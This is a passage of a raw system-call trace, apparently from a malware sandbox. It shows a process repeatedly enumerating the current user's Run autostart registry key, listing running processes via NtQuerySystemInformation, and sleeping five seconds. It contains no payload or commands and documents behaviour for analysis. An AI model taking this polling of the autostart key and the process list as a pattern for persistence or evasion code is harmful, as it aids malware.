Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.629] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.629] NtClose (Handle=0x274) returned 0x0 [0177.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.648] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.650] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.650] NtClose (Handle=0x274) returned 0x0 [0177.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.665] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.666] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.666] NtClose (Handle=0x274) returned 0x0 [0177.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.679] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.680] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.680] NtClose (Handle=0x274) returned 0x0 [0177.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.763] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.764] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.764] NtClose (Handle=0x274) returned 0x0 [0177.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.777] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.778] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.778] NtClose (Handle=0x274) returned 0x0 [0177.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.788] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.789] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.790] NtClose (Handle=0x274) returned 0x0 [0177.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.796] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.798] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.799] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.800] NtClose (Handle=0x274) returned 0x0 [0177.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.812] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.812] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.812] NtClose (Handle=0x274) returned 0x0 [0177.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.824] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.826] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.826] NtClose (Handle=0x274) returned 0x0 [0177.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.870] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.871] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.871] NtClose (Handle=0x274) returned 0x0 [0177.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.882] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.883] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.883] NtClose (Handle=0x274) returned 0x0 [0177.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.894] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.895] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.895] NtClose (Handle=0x274) returned 0x0 [0177.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0177.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0177.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0177.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0177.906] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0177.907] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0177.907] NtClose (Handle=0x274) returned 0x0 [0177.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0177.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0177.909] NtFreeVirtualMemory 